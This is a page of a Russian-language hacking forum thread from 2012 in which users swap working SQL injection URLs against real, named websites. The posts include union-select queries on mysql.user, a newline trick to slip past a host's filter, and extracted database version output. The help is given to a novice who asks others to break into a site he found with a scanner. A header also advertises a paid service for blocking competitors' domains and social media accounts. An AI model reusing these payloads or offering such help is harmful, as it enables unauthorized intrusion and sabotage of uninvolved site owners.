УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2110 из 2438

2110

Опции темы

Поиск в этой теме

Опции просмотра

#21091

26.07.2012, 14:22

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Цитата:

Сообщение от Hapk

Hapk said:
и что теперь нечего нельзя сделать?

Чем тебя мой вариант не устраивает ?

#21092

26.07.2012, 14:49

Hapk

Guest

Сообщений: n/a

Провел на форуме:
70690

Репутация: -5

Цитата:

Сообщение от BigBear

BigBear said:
Чем тебя
мой вариант
не устраивает ?

http://betz.su/myturnir/turnir.php?tur=455%27+and+substring((@@version),1, 1)='5

Нет нечего

#21093

26.07.2012, 15:11

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Цитата:

Сообщение от Hapk

Hapk said:
http://betz.su/myturnir/turnir.php?tur=455%27+and+substring((@@version),1, 1)='5
Нет нечего

Blind MySQL-Injection ? Не слышал, не ?

А тут читал ??

#21094

26.07.2012, 15:23

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

Провел на форуме:
9751379

Репутация: 3812

Отправить сообщение для +toxa+ с помощью ICQ

Отправить сообщение для +toxa+ с помощью AIM

Цитата:

Сообщение от BigBear

BigBear said:
Blind MySQL-Injection ? Не слышал, не ?
А
тут
читал ??

а ты читал что

Цитата:

Сообщение от Melfis

Melfis said:
фильтруется select и union

, а стало быть подзапросы не работают?

__________________

#21095

27.07.2012, 17:33

MaxFast

Guest

Сообщений: n/a

Провел на форуме:
178623

Репутация: 94

Как обойти зашиту от Spaceweb?

У меня такой запрос:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site.ru/news_view.php?id=-189'+union+select+1,2,3,4,5,6,7,file_priv,9+from+mysql.user+--+[/COLOR][/COLOR]

Но после выполняется редирект на сайт Spaceweb, как обойти это?

#21096

27.07.2012, 18:19

VY_CMa

Guest

Сообщений: n/a

Провел на форуме:
193811

Репутация: 724

Цитата:

Сообщение от MaxFast

MaxFast said:
Как обойти зашиту от Spaceweb?
У меня такой запрос:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site.ru/news_view.php?id=-189'+union+select+1,2,3,4,5,6,7,file_priv,9+from+mysql.user+--+[/COLOR][/COLOR]

Но после выполняется редирект на сайт Spaceweb, как обойти это?

Попытаться вызвать ошибку, например используя extravalue()

#21097

27.07.2012, 18:30

d1v

Новичок

Регистрация: 21.02.2009

Сообщений: 3

Провел на форуме:
58401

Репутация: 0

Цитата:

Сообщение от MaxFast

MaxFast said:
Как обойти зашиту от Spaceweb?
У меня такой запрос:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site.ru/news_view.php?id=-189'+union+select+1,2,3,4,5,6,7,file_priv,9+from+mysql.user+--+[/COLOR][/COLOR]

Но после выполняется редирект на сайт Spaceweb, как обойти это?

http://site.ru/news_view.php?id=-189'+union%0Aselect+1,2,3,4,5,6,7,file_priv,9+from+mysql.user+--+

#21098

28.07.2012, 13:32

compod

Guest

Сообщений: n/a

Провел на форуме:
9089

Репутация: 1

Добрый день, я совсем новичок, и вот нашел парсером скуль и начал пробовать вот так:

Код:

Code:
http://prazdnik.com.ua/index.php?id=54&pid=3509+order+by+10/*
http://prazdnik.com.ua/index.php?id=54&pid=3509+order+by+10
http://prazdnik.com.ua/index.php?id=54&pid=3509+order+by+10
http://prazdnik.com.ua/index.php?id=54&pid=-3509+order+by+10/*
http://prazdnik.com.ua/index.php?id=54&pid=1+order+by+10
http://prazdnik.com.ua/index.php?id=54&pid=-1+order+by+10
http://prazdnik.com.ua/index.php?id=54&pid=1+union+select+1,2,3,4,5

и т.д.

Но нужных ошибок я все равно не получил, кто может раскрутите, покажите и ткните что я неправильно сделал

#21099

28.07.2012, 13:51

a.dimka

Guest

Сообщений: n/a

Провел на форуме:
0

Репутация: 3

to compod

http://prazdnik.com.ua/index.php?id=54&pid=3509-9999.9+union+select+111111,version(),33333333,4444 4444,555555,6666666,7777777,8888888,9999999,10,11, 12,13,14,15--+f

Вывод в исходном коде на 399 строке

либо в середине страницы

5.0.51a-24+lenny5-log

#21100

28.07.2012, 14:00

shell_c0de

Reservists Of Antichat - Level 6

Регистрация: 07.07.2009

Сообщений: 324

Провел на форуме:
1585404

Репутация: 564

Отправить сообщение для shell_c0de с помощью ICQ

Отправить сообщение для shell_c0de с помощью AIM

http://prazdnik.com.ua/index.php?id=54&pid=3509+union+select+1,version(), 3,4,5,6,7,8,9,10,11,12,13,14,15--

Самые забавные первоапрельские розыгрыши 2013 на телефон

5.0.51a-24+lenny5-log

__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.

Страница 2110 из 2438

2110

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход